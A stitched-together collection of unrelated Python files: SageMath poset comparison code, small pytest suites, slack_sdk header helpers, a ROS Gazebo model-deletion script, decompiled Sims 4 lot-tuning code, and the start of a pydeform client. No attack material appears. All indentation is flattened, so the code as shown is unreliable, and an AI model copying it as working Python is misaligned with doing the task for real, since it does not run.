raise ValueError("No order '%s' known." % (order,))
else:
self._le_ = order
from sage.categories.category import Category
from sage.categories.posets import Posets
if not isinstance(category, tuple):
category = (category,)
category = Category.join(category + (Posets(),))
super(CartesianProductPoset, self).__init__(
sets, category, **kwargs)
def le(self, left, right):
r"""
Test whether ``left`` is less than or equal to ``right``.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the order defined on creation of this
Cartesian product. See :class:`CartesianProductPoset`.
EXAMPLES::
sage: P = posets.ChainPoset(10)
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((P, P), order=le_sum)
sage: C.le(C((1, 6)), C((6, 1)))
True
sage: C.le(C((6, 1)), C((1, 6)))
False
sage: C.le(C((1, 6)), C((6, 6)))
True
sage: C.le(C((6, 6)), C((1, 6)))
False
"""
return self._le_(left, right)
def le_lex(self, left, right):
r"""
Test whether ``left`` is lexicographically smaller or equal
to ``right``.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
EXAMPLES::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='lex')
sage: T = [Q((0, 0)), Q((1, 1)), Q((0, 1)), Q((1, 0))]
sage: for a in T:
....: for b in T:
....: assert(Q.le(a, b) == (a <= b))
....: print('%s <= %s = %s' % (a, b, a <= b))
(0, 0) <= (0, 0) = True
(0, 0) <= (1, 1) = True
(0, 0) <= (0, 1) = True
(0, 0) <= (1, 0) = True
(1, 1) <= (0, 0) = False
(1, 1) <= (1, 1) = True
(1, 1) <= (0, 1) = False
(1, 1) <= (1, 0) = False
(0, 1) <= (0, 0) = False
(0, 1) <= (1, 1) = True
(0, 1) <= (0, 1) = True
(0, 1) <= (1, 0) = True
(1, 0) <= (0, 0) = False
(1, 0) <= (1, 1) = True
(1, 0) <= (0, 1) = False
(1, 0) <= (1, 0) = True
TESTS:
Check that :trac:`19999` is resolved::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='product')
sage: R = cartesian_product((Q, P), order='lex')
sage: R(((1, 0), 0)) <= R(((0, 1), 0))
False
sage: R(((0, 1), 0)) <= R(((1, 0), 0))
False
"""
for l, r, S in \
zip(left.value, right.value, self.cartesian_factors()):
if l == r:
continue
if S.le(l, r):
return True
if S.le(r, l):
return False
return False # incomparable components
return True # equal
def le_product(self, left, right):
r"""
Test whether ``left`` is component-wise smaller or equal
to ``right``.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
The comparison is ``True`` if the result of the
comparison in each component is ``True``.
EXAMPLES::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='product')
sage: T = [Q((0, 0)), Q((1, 1)), Q((0, 1)), Q((1, 0))]
sage: for a in T:
....: for b in T:
....: assert(Q.le(a, b) == (a <= b))
....: print('%s <= %s = %s' % (a, b, a <= b))
(0, 0) <= (0, 0) = True
(0, 0) <= (1, 1) = True
(0, 0) <= (0, 1) = True
(0, 0) <= (1, 0) = True
(1, 1) <= (0, 0) = False
(1, 1) <= (1, 1) = True
(1, 1) <= (0, 1) = False
(1, 1) <= (1, 0) = False
(0, 1) <= (0, 0) = False
(0, 1) <= (1, 1) = True
(0, 1) <= (0, 1) = True
(0, 1) <= (1, 0) = False
(1, 0) <= (0, 0) = False
(1, 0) <= (1, 1) = True
(1, 0) <= (0, 1) = False
(1, 0) <= (1, 0) = True
"""
return all(
S.le(l, r)
for l, r, S in
zip(left.value, right.value, self.cartesian_factors()))
def le_native(self, left, right):
r"""
Test whether ``left`` is smaller or equal to ``right`` in the order
provided by the elements themselves.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
EXAMPLES::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='native')
sage: T = [Q((0, 0)), Q((1, 1)), Q((0, 1)), Q((1, 0))]
sage: for a in T:
....: for b in T:
....: assert(Q.le(a, b) == (a <= b))
....: print('%s <= %s = %s' % (a, b, a <= b))
(0, 0) <= (0, 0) = True
(0, 0) <= (1, 1) = True
(0, 0) <= (0, 1) = True
(0, 0) <= (1, 0) = True
(1, 1) <= (0, 0) = False
(1, 1) <= (1, 1) = True
(1, 1) <= (0, 1) = False
(1, 1) <= (1, 0) = False
(0, 1) <= (0, 0) = False
(0, 1) <= (1, 1) = True
(0, 1) <= (0, 1) = True
(0, 1) <= (1, 0) = True
(1, 0) <= (0, 0) = False
(1, 0) <= (1, 1) = True
(1, 0) <= (0, 1) = False
(1, 0) <= (1, 0) = True
"""
return left.value <= right.value
class Element(CartesianProduct.Element):
def _le_(self, other):
r"""
Return if this element is less or equal to ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method calls :meth:`CartesianProductPoset.le`. Override
it in inherited class to change this.
It can be assumed that this element and ``other`` have
the same parent.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) <= C((2, 1/3)) # indirect doctest
True
sage: C((1/3, 2)) <= C((2, 2)) # indirect doctest
True
"""
return self.parent().le(self, other)
def __le__(self, other):
r"""
Return if this element is less than or equal to ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) <= C((2, 1/3))
True
sage: C((1/3, 2)) <= C((2, 2))
True
The following example tests that the coercion gets involved in
comparisons; it can be simplified once :trac:`18182` is merged.
::
sage: class MyCP(CartesianProductPoset):
....: def _coerce_map_from_(self, S):
....: if isinstance(S, self.__class__):
....: S_factors = S.cartesian_factors()
....: R_factors = self.cartesian_factors()
....: if len(S_factors) == len(R_factors):
....: if all(r.has_coerce_map_from(s)
....: for r,s in zip(R_factors, S_factors)):
....: return True
sage: QQ.CartesianProduct = MyCP
sage: A = cartesian_product((QQ, ZZ), order=le_sum)
sage: B = cartesian_product((QQ, QQ), order=le_sum)
sage: A((1/2, 4)) <= B((1/2, 5))
True
"""
from sage.structure.element import have_same_parent
if have_same_parent(self, other):
return self._le_(other)
from sage.structure.element import get_coercion_model
import operator
try:
return get_coercion_model().bin_op(self, other, operator.le)
except TypeError:
return False
def __ge__(self, other):
r"""
Return if this element is greater than or equal to ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) >= C((2, 1/3))
False
sage: C((1/3, 2)) >= C((2, 2))
False
"""
return other <= self
def __lt__(self, other):
r"""
Return if this element is less than ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) < C((2, 1/3))
True
sage: C((1/3, 2)) < C((2, 2))
True
"""
return not self == other and self <= other
def __gt__(self, other):
r"""
Return if this element is greater than ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) > C((2, 1/3))
False
sage: C((1/3, 2)) > C((2, 2))
False
"""
return not self == other and other <= self
|
#!/usr/bin/env python3
import warnings
import pytest
import rocks
@pytest.mark.parametrize("id_", ["Fortuna", "doesnotexist", "Ceres"])
def test_get_ssoCard(id_):
warnings.filterwarnings("ignore", "UserWarning")
card = rocks.ssodnet.get_ssocard(id_)
if id_ == "Ceres":
assert isinstance(card, dict)
else:
assert card is None
|
import logging
from typing import Optional, Dict, Any
from slack_sdk.web.internal_utils import (
_parse_web_class_objects,
get_user_agent,
convert_bool_to_0_or_1,
)
from .webhook_response import WebhookResponse
def _build_body(original_body: Optional[Dict[str, Any]]) -> Optional[Dict[str, Any]]:
if original_body:
body = {k: v for k, v in original_body.items() if v is not None}
body = convert_bool_to_0_or_1(body)
_parse_web_class_objects(body)
return body
return None
def _build_request_headers(
default_headers: Dict[str, str],
additional_headers: Optional[Dict[str, str]],
) -> Dict[str, str]:
if default_headers is None and additional_headers is None:
return {}
request_headers = {
"Content-Type": "application/json;charset=utf-8",
}
if default_headers is None or "User-Agent" not in default_headers:
request_headers["User-Agent"] = get_user_agent()
    if default_headers:
        request_headers.update(default_headers)
if additional_headers:
request_headers.update(additional_headers)
return request_headers
def _debug_log_response(logger, resp: WebhookResponse) -> None:
if logger.level <= logging.DEBUG:
logger.debug(
"Received the following response - "
f"status: {resp.status_code}, "
f"headers: {(dict(resp.headers))}, "
f"body: {resp.body}"
)
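# Hedged demonstration (not part of the module): how the merge order plays
# out. The JSON Content-Type is set first, a User-Agent is filled in when
# missing, then defaults and finally additional headers are layered on top.
if __name__ == "__main__":
    merged = _build_request_headers(
        default_headers={"Authorization": "Bearer xoxb-placeholder"},
        additional_headers={"X-Trace-Id": "abc123"},
    )
    print(merged)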
|
from unittest.mock import Mock
import pytest
from atst.domain.permission_sets import PermissionSets
from atst.models import Permissions
from atst.utils.context_processors import (
get_resources_from_context,
user_can_view,
portfolio as portfolio_context,
)
from tests.factories import *
def test_get_resources_from_context():
portfolio = PortfolioFactory.create()
task_order = TaskOrderFactory.create(portfolio=portfolio)
application = ApplicationFactory.create(portfolio=portfolio)
environment = EnvironmentFactory.create(application=application)
assert get_resources_from_context({"portfolio_id": portfolio.id}) == (portfolio,)
assert get_resources_from_context({"application_id": application.id}) == (
portfolio,
application,
)
assert get_resources_from_context({"environment_id": environment.id}) == (
portfolio,
application,
)
assert get_resources_from_context({"task_order_id": task_order.id}) == (
portfolio,
task_order,
)
@pytest.fixture
def set_g(monkeypatch):
_g = Mock()
monkeypatch.setattr("atst.utils.context_processors.g", _g)
def _set_g(attr, val):
setattr(_g, attr, val)
yield _set_g
def test_user_can_view(set_g):
owner = UserFactory.create()
app_user = UserFactory.create()
rando = UserFactory.create()
portfolio = PortfolioFactory.create(owner=owner)
application = ApplicationFactory.create(portfolio=portfolio)
ApplicationRoleFactory.create(
user=app_user,
application=application,
permission_sets=PermissionSets.get_many([PermissionSets.VIEW_APPLICATION]),
)
set_g("portfolio", portfolio)
set_g("application", application)
set_g("current_user", owner)
assert user_can_view(Permissions.VIEW_APPLICATION)
set_g("current_user", app_user)
assert user_can_view(Permissions.VIEW_APPLICATION)
set_g("current_user", rando)
assert not user_can_view(Permissions.VIEW_APPLICATION)
def test_portfolio_no_user(set_g):
set_g("current_user", None)
assert portfolio_context() == {}
def test_portfolio_with_user(set_g):
user = UserFactory.create()
set_g("current_user", user)
set_g("portfolio", None)
assert portfolio_context() != {}
|
#!/usr/bin/env python
# Copyright (c) 2013-2015, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Baxter RSDK Inverse Kinematics Pick and Place Demo
*** modified ***
modelState service
placing picture
three blocks
Biggest part of the file was created by Rethink Robotics.
For my project I created the following functions:
load_gazebo_models
number_to_configuration
delete_gazebo_models
get_model_pose
get_actual_pose
"""
import signal
import rospy
import os
from gazebo_msgs.srv import (
SpawnModel,
SetModelState,
DeleteModel,
GetModelState,
)
def signal_handler(signum, frame):  # signal handlers receive (signum, frame)
    print('Signal handler')
def delete_model(model_name, delete_service = None):
    if delete_service is None:
delete_service = rospy.ServiceProxy('/gazebo/delete_model', DeleteModel)
rospy.wait_for_service('/gazebo/delete_model')
try:
delete_service(model_name)
except rospy.ServiceException, e:
rospy.loginfo("Delete Model service call failed: {0}".format(e))
def delete_all(parameter='bottles'):
delete_service = rospy.ServiceProxy('/gazebo/delete_model', DeleteModel)
rospy.wait_for_service('/gazebo/delete_model')
for num in [1,2,3,4,5,6]:
delete_model("bottle_" + str(num), delete_service)
for num in [1,2,3]:
delete_model("cup_" + str(num), delete_service)
if __name__ == '__main__':
delete_all('bottles')
    # load_models()
|
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\world\lot_tuning.py
# Compiled at: 2020-04-27 21:48:35
# Size of source mod 2**32: 27675 bytes
import collections, math
from audio.primitive import TunablePlayAudio
from event_testing.resolver import SingleObjectResolver
from event_testing.tests import TunableTestSet
from interactions import ParticipantType
from objects.components.state import TunableStateValueReference
from objects.components.types import VEHICLE_COMPONENT
from sims4.tuning.instances import HashedTunedInstanceMetaclass
from sims4.tuning.tunable import TunableMapping, TunableLotDescription, TunableRegionDescription, HasTunableReference, TunableWorldDescription, TunableReference, TunableList, TunableFactory, TunableTuple, TunableVariant, Tunable, OptionalTunable
from situations.ambient.walkby_tuning import SchedulingWalkbyDirector
import event_testing.state_tests, objects.object_tests, services, sims4.log, situations.ambient.walkby_tuning
logger = sims4.log.Logger('LotTuning')
class LotTuning(HasTunableReference, metaclass=HashedTunedInstanceMetaclass, manager=services.lot_tuning_manager()):
INSTANCE_TUNABLES = {'walkby':situations.ambient.walkby_tuning.WalkbyTuning.TunableReference(allow_none=True),
'walkby_schedule':SchedulingWalkbyDirector.TunableReference(allow_none=True),
'audio_sting':OptionalTunable(description='\n If enabled then the specified audio sting will play at the end\n of the camera lerp when the lot is loaded.\n ',
tunable=TunablePlayAudio(description='\n The sound to play at the end of the camera lerp when the\n lot is loaded.\n ')),
'travel_audio_sting':OptionalTunable(description="\n If enabled then the specified audio sting will play at the end\n of the camera lerp after a travel. If disabled, 'Audio Sting'\n will play instead if it is enabled.\n ",
tunable=TunablePlayAudio(description='\n The sound to play at when entering the lot after a travel.\n ')),
'track_premade_status':Tunable(description="\n If enabled, the lot will be flagged as no longer premade when the\n player enters buildbuy on the lot or drops items/lots/rooms from\n the gallery. Otherwise, the lot is still considered premade.\n If disabled, the game won't care if this lot is premade or not.\n \n For example, the retail lots that were shipped with EP01 will track\n the premade status so we know if objects should automatically be\n set for sale.\n ",
tunable_type=bool,
default=False)}
class LotTuningMaps:
LOT_TO_LOTTUNING_MAP = TunableMapping(description="\n Mapping of Lot Description ID to lot tuning. This is a reference to \n a specific lot in one of our regions. e.g. Goth's mansion lot.\n ",
key_name='Lot Description ID',
key_type=TunableLotDescription(pack_safe=True),
value_name='Lot Tuning',
value_type=(LotTuning.TunablePackSafeReference()))
STREET_TO_LOTTUNING_MAP = TunableMapping(description='\n Mapping of Street Description ID to lot tuning. Street and world\n are analogous terms. e.g. suburbs street in Garden District.\n \n This represents the tuning for all lots within this street that does\n not have a specific LotTuning specified for itself in the \n LOT_TO_LOTTUNING_MAP.\n ',
key_name='Street Description ID',
key_type=TunableWorldDescription(pack_safe=True),
value_name='Lot Tuning',
value_type=(LotTuning.TunablePackSafeReference()))
REGION_TO_LOTTUNING_MAP = TunableMapping(description='\n Mapping of Region Description ID to spawner tuning. Region and \n neighborhood are analogous terms. e.g. Garden District.\n \n This represents the tuning for all lots in the region that does\n not have a specific LotTuning specified for itself in either the \n LOT_TO_LOTTUNING_MAP or via STREET_TO_LOTTUNING_MAP.\n ',
key_name='Region Description ID',
key_type=TunableRegionDescription(pack_safe=True),
value_name='Lot Tuning',
value_type=(LotTuning.TunablePackSafeReference()))
@classmethod
def get_lot_tuning(cls):
current_zone = services.current_zone()
lot = current_zone.lot
if lot is None:
logger.warn('Attempting to get LotTuning when the current zone does not have a lot.', owner='manus')
return
world_description_id, lot_description_id = services.get_world_and_lot_description_id_from_zone_id(current_zone.id)
lot_tuning = cls.LOT_TO_LOTTUNING_MAP.get(lot_description_id)
if lot_tuning is not None:
return lot_tuning
lot_tuning = cls.STREET_TO_LOTTUNING_MAP.get(world_description_id, None)
if lot_tuning is not None:
return lot_tuning
neighborhood_id = current_zone.neighborhood_id
if neighborhood_id == 0:
logger.warn('Attempting to get LotTuning when the current zone does not have a neighborhood.', owner='manus')
return
neighborhood_proto_buff = services.get_persistence_service().get_neighborhood_proto_buff(neighborhood_id)
region_id = neighborhood_proto_buff.region_id
lot_tuning = cls.REGION_TO_LOTTUNING_MAP.get(region_id, None)
return lot_tuning
class AllItems(TunableFactory):
@staticmethod
def factory(_):
return sims4.math.POS_INFINITY
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(description='\n Process all of the objects on the lot.\n ')
class StatisticValue(TunableFactory):
@staticmethod
def factory(lot, statistic):
statistic_value = lot.get_stat_value(statistic)
if statistic_value is None:
return 0
return math.floor(statistic_value)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic=TunableReference(description='\n The statistic on the lot that will be used to determine the\n number of objects to process.\n If the statistic is not found then the number 0 is used instead.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
description='\n Return the value of a statistic on the lot. If the statistic\n is not found then the number 0 is used instead.\n ')
class StatisticDifference(TunableFactory):
@staticmethod
def factory(lot, statistic_1, statistic_2):
statistic_1_value = lot.get_stat_value(statistic_1)
if statistic_1_value is None:
statistic_1_value = 0
statistic_2_value = lot.get_stat_value(statistic_2)
if statistic_2_value is None:
statistic_2_value = 0
return math.floor(abs(statistic_1_value - statistic_2_value))
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic_1=TunableReference(description='\n The first statistic that will be used with the second statistic\n in order to discover the number of objects on the lot to\n process.\n \n If the statistic is not found then the number 0 is use instead.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
statistic_2=TunableReference(description='\n The second statistic that will be used with the first statistic\n in order to discover the number of objects on the lot to\n process.\n \n If the statistic is not found then the number 0 is use instead.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
description='\n Return the difference between two different statistics and use\n that as the amount of objects to process.\n If the statistics cannot be found the value 0 is used instead.\n ')
class SetState(TunableFactory):
@staticmethod
def factory(obj, _, state):
if obj.state_component:
if obj.has_state(state.state):
                obj.set_state(state.state, state, immediate=True)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(state=TunableStateValueReference(description='\n An state that we want to set the object to.\n '),
description='\n Change the state of an object to the tuned state.\n ')
class DestroyObject(TunableFactory):
@staticmethod
def factory(obj, _):
GlobalLotTuningAndCleanup.objects_to_destroy.add(obj)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(description='\n Destroy the object.\n ')
class CleanupVehicle(TunableFactory):
@staticmethod
def factory(obj, _):
vehicle_component = obj.get_component(VEHICLE_COMPONENT)
household_owner_id = obj.get_household_owner_id()
if vehicle_component is not None:
if household_owner_id is None or household_owner_id == 0:
if not obj.interaction_refs:
GlobalLotTuningAndCleanup.objects_to_destroy.add(obj)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
        super().__init__(*args, description="\n            Cleanup a vehicle that isn't being used by destroying it.\n            ", **kwargs)
class ConstantAmount(TunableFactory):
@staticmethod
def factory(_, amount):
return amount
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(amount=Tunable(description='\n A constant amount to change the statistic by.\n ',
tunable_type=float,
default=0.0),
description='\n A constant amount.\n ')
class StatisticBased(TunableFactory):
@staticmethod
def factory(lot, statistic, multiplier):
statistic_value = lot.get_stat_value(statistic)
if statistic_value is None:
return 0
return statistic_value * multiplier
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic=TunableReference(description="\n A statistic on the lot who's value will be used as the amount\n to modify a statistic.\n If no value is found the number 0 is used.\n ",
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
multiplier=Tunable(description='\n A multiplier on the statistic value of the statistic on the lot.\n ',
tunable_type=float,
default=1.0),
description='\n An amount that is based on the statistic value of a statistic\n on the lot.\n ')
class StatisticChange(TunableFactory):
@staticmethod
def factory(obj, lot, statistic, amount):
obj.add_statistic_component()
stat_instance = obj.get_stat_instance(statistic)
if stat_instance is None:
return
stat_change = amount(lot)
stat_instance.add_value(stat_change)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic=TunableReference(description='\n The statistic to be changed on the object.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
amount=TunableVariant(constant=(ConstantAmount()),
statistic_based=(StatisticBased()),
description='\n The amount to modify the statistic by.\n '),
description='\n Modify the statistic value of an object.\n ')
class GlobalLotTuningAndCleanup:
OBJECT_COUNT_TUNING = TunableMapping(description='\n Mapping between statistic and a set of tests that are run over the\n objects on the lot on save. The value of the statistic is set to the\n number of objects that pass the tests.\n ',
key_type=TunableReference(description='\n The statistic on the lot that will be set the value of the number\n of objects that pass the test set that it is mapped to.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC)),
pack_safe=True),
value_type=TunableTestSet(description='\n Test set that will be run on all objects on the lot to determine\n what the value of the key statistic should be set to.\n '))
SET_STATISTIC_TUNING = TunableList(description='\n A list of statistics and values that they will be set to on the lot\n while saving it when the lot was running.\n \n These values are set before counting by tests on objects.\n ',
tunable=TunableTuple(statistic=TunableReference(description='\n The statistic that will have its value set.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
amount=Tunable(description='\n The value that the statistic will be set to.\n ',
tunable_type=float,
default=0.0)))
OBJECT_CLEANUP_TUNING = TunableList(description='\n A list of actions to take when spinning up a zone in order to fix it\n up based on statistic values that the lot has.\n ',
tunable=TunableTuple(count=TunableVariant(all_items=(AllItems()),
statistic_value=(StatisticValue()),
statistic_difference=(StatisticDifference()),
default='all_items',
description='\n The maximum number of items that will have the action run\n on them. \n '),
possible_actions=TunableList(description='\n The different possible actions that can be taken on objects on\n the lot if tests pass.\n ',
tunable=TunableTuple(actions=TunableList(description='\n A group of actions to be taken on the object.\n ',
tunable=TunableVariant(set_state=(SetState()),
destroy_object=(DestroyObject()),
statistic_change=(StatisticChange()),
cleanup_vehicle=(CleanupVehicle()),
default='set_state',
description='\n The actual action that will be performed on the\n object if test passes.\n ')),
tests=TunableTestSet(description='\n Tests that if they pass the object will be under\n consideration for this action being done on them.\n ')))))
objects_to_destroy = None
_count_tuning_optimizer = None
@classmethod
def _get_stat_count_optimizer(cls):
if cls._count_tuning_optimizer is None:
cls._count_tuning_optimizer = ObjectCountTuningOptimizer(cls.OBJECT_COUNT_TUNING)
return cls._count_tuning_optimizer
@classmethod
def calculate_object_quantity_statistic_values(cls, lot):
        for set_statistic in cls.SET_STATISTIC_TUNING:
            lot.set_stat_value(set_statistic.statistic, set_statistic.amount)
new_statistic_values = collections.defaultdict(int)
stat_counter = cls._get_stat_count_optimizer()
for obj in services.object_manager().values():
if obj.is_sim:
continue
if not obj.is_on_active_lot():
continue
stat_counter.increment_statistics(obj, new_statistic_values)
for statistic, value in new_statistic_values.items():
lot.set_stat_value(statistic, value)
@classmethod
def cleanup_objects(cls, lot=None):
if lot is None:
logger.error('Lot is None when trying to run lot cleanup.', owner='jjacobson')
return
cls.objects_to_destroy = set()
for cleanup in GlobalLotTuningAndCleanup.OBJECT_CLEANUP_TUNING:
items_to_cleanup = cleanup.count(lot)
if items_to_cleanup == 0:
continue
items_cleaned_up = 0
for obj in services.object_manager().values():
if items_cleaned_up >= items_to_cleanup:
break
if obj.is_sim:
continue
resolver = SingleObjectResolver(obj)
run_action = False
for possible_action in cleanup.possible_actions:
if possible_action.tests.run_tests(resolver):
for action in possible_action.actions:
action(obj, lot)
run_action = True
if run_action:
items_cleaned_up += 1
for obj in cls.objects_to_destroy:
obj.destroy(source=lot, cause='Cleaning up the lot')
cls.objects_to_destroy = None
class ObjectCountTuningOptimizer:
def __init__(self, tuning):
self._tag_to_test_mapping = None
self._state_to_test_mapping = None
self._relevant_tags = None
self.analyze_tuning(tuning)
def analyze_tuning(self, tuning):
self._tag_to_test_mapping = collections.defaultdict(list)
self._state_to_test_mapping = collections.defaultdict(list)
self._relevant_tags = set()
ObjectCriteriaTest = objects.object_tests.ObjectCriteriaTest
StateTest = event_testing.state_tests.StateTest
for statistic, test_set in tuning.items():
for test_list in test_set:
for test in test_list:
if isinstance(test, ObjectCriteriaTest):
subject_specific_tests = test.subject_specific_tests
if subject_specific_tests.subject_type == ObjectCriteriaTest.ALL_OBJECTS:
logger.error("Object count criteria test can not use type 'All Objects'")
continue
if subject_specific_tests.target != ParticipantType.Object:
                            logger.error('Object count criteria test must target ParticipantType.Object, not {}', subject_specific_tests.target)
continue
if not hasattr(test, 'identity_test'):
logger.error('Object count criteria test must have tags')
continue
identity_test_tags = test.identity_test.tag_set
for tag in identity_test_tags:
self._tag_to_test_mapping[tag].append((test_set, statistic))
self._relevant_tags.update(identity_test_tags)
elif isinstance(test, StateTest):
if test.who != ParticipantType.Object:
logger.error('Object count state test must target ParticipantType.Object, not {}', test.who)
continue
if test.fallback_behavior != StateTest.ALWAYS_FAIL:
logger.error("Object count state test must use 'Always Fail'")
continue
state = test.value.state
self._state_to_test_mapping[state].append((test_set, statistic))
else:
logger.error('Object count tuning only supports tag-based object criteria tests and state tests, not {}', test)
def increment_statistics(self, obj, statistic_values):
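        # Pre-filter by build/buy tags (or, failing that, by object states) so
        # that only the test sets that could plausibly pass are run in full.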
tests_to_run = collections.defaultdict(TestSetStats)
tags = {t for t in self._relevant_tags if obj.definition.has_build_buy_tag(t)}
if tags:
for tag in tags:
test_list = self._tag_to_test_mapping[tag]
for test_set, statistic in test_list:
test_set_stats = tests_to_run[id(test_set)]
test_set_stats.test_set = test_set
test_set_stats.stats.append(statistic)
else:
state_component = obj.state_component
if state_component is not None:
for state, test_list in self._state_to_test_mapping.items():
if state_component.has_state(state):
for test_set, statistic in test_list:
test_set_stats = tests_to_run[id(test_set)]
test_set_stats.test_set = test_set
test_set_stats.stats.append(statistic)
        if not tests_to_run:
            return
resolver = SingleObjectResolver(obj)
incremented_statistics = set()
for test_set_stats in tests_to_run.values():
if test_set_stats.test_set.run_tests(resolver):
for statistic in test_set_stats.stats:
if statistic not in incremented_statistics:
statistic_values[statistic] += 1
incremented_statistics.add(statistic)
class TestSetStats:
__slots__ = ('test_set', 'stats')
def __init__(self):
self.test_set = None
self.stats = [] |
# -*- coding: utf-8 -*-
import requests
from pydeform.auth import (
get_session_http_auth_header,
get_token_http_auth_header
)
from pydeform.resources import (
CollectionListResource,
CollectionOneResource,
CurrentProjectInfoResource,
DocumentListResource,
DocumentOneResource,
NonAuthUserResource,
ProjectListResource,
ProjectOneResource,
SessionUserResource
)
from pydeform.utils import get_base_uri
_DOCS_DATA = {
'requests_session_url': (
'http://docs.python-requests.org/en/master/user/advanced/#session-objects'
),
